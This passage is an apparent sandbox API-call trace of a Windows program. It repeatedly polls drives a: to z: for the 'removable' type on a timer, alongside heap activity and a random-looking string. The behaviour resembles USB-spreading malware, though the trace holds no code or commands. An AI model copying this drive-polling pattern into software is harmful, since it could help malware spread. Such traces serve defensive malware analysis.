(lpRootPathName="e:\\") returned 0x1 [0217.464] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.464] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.464] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.464] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.465] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.465] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.465] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.465] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.465] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.465] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.466] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.466] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.466] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.466] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.466] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.466] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.466] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.467] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.467] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.467] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.467] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.467] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.467] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.467] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.467] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.467] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.467] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.467] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.468] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.468] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0217.468] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.468] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0217.468] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.468] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.468] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.468] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.468] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.468] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.468] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.468] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.468] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.468] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0217.468] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325fe0 [0217.469] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325fe0 | out: hHeap=0x12c0000) returned 1 [0217.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0217.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.469] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0217.469] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0217.469] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0217.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0217.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.469] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.469] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0217.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0217.469] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.469] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0217.469] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.470] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0217.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0217.470] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0217.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0217.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0217.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0217.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0217.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0217.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0217.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.470] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.470] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.471] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.471] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.471] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.471] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.471] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.472] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.472] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.472] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.472] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.472] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.472] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.473] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.473] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.473] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.473] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.473] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.474] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.474] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.474] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.479] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.479] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.479] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.479] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.480] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.480] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0217.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0217.480] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.480] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0217.481] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0217.481] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.481] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.481] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.481] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.481] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.481] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.481] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0217.481] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326080 [0217.481] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.481] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.481] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.481] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326080 | out: hHeap=0x12c0000) returned 1 [0217.481] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.481] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.482] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0217.482] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0217.482] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0217.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0217.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0217.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0217.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.482] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.482] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0217.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.482] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.482] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0217.482] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0217.482] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0217.483] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0217.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0217.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.483] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0217.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.483] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0217.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0217.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0217.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.483] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.483] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.484] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.484] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.484] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.484] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.485] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.485] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.485] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.485] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.485] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.486] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.486] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.486] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.486] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.487] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.487] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.487] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.487] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.492] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.492] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.492] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.493] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.493] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.493] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.493] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.494] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.494] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.494] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0217.494] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.494] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.494] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.495] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.495] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.495] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.495] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0217.495] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.495] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.495] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.495] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.495] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.495] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.495] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.495] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.495] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.495] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0217.495] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0217.496] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0217.496] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326100 [0217.496] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.496] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0217.496] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.496] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326100 | out: hHeap=0x12c0000) returned 1 [0217.496] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0217.496] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0217.496] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0217.496] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.496] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0217.496] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.496] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.497] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.497] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.497] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.497] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.497] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.497] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.497] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.497] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.497] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.497] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.497] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.497] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.497] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0217.497] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.498] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.498] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.498] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0217.498] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd208 [0217.498] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.498] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.498] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0217.498] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.498] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0217.498] RtlAllocateHeap 